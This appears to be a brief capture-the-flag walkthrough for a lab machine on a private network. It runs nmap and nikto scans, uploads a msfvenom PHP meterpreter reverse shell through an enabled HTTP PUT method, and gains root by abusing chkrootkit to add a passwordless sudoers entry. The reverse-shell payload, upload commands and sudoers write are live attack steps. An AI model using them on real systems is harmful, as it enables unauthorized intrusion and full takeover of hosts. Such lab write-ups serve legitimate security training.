#1 Find the target
nmap -sS -O 192.168.1.0/24 to
confirm ip 192.168.1.124
#2 Scan the port
nmap -sS -O -sV 192.168.1.124 to
find the open port 80, start from the web.
#3 find the entrance
Look at the source code, nothing more.
Scan the directory,
visit and take a
look , and notice that lighttpd/1.4.28 is available for use, but no one is available.
Scan with nikto and see some information
nikto -host 192.168.1.124
nmap. Look at the methods opened in http Method, there is a put method, try uploading
nmap 192.168.1.124 -p 80 --script http-methods --script-args http-methods.url-path='/test'
Use msfvenom to generate php⻢
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.123 LPORT=443 -f raw > shell_443.php
Upload log
nmap 192.168.1.124 -p 80 --script http-put --script-args http-put.url='/test/shell_443.php',http-put.file="shell_443.php"
Use msf expload/multi/handler to monitor
#4
Privilege escalation found that chkrootkit
uses exp to escalate privilege
Create an update file
touch /tmp/update
Give the update file execution permission
chmod +x /tmp/update
Give the update file rights
echo 'chmod +w /etc/sudoers && echo "www-data ALL=(ALL)NOPASSWD:ALL" >> /etc/sudoers' > /tmp/update
Right escalation
sudo su root
Looking for flag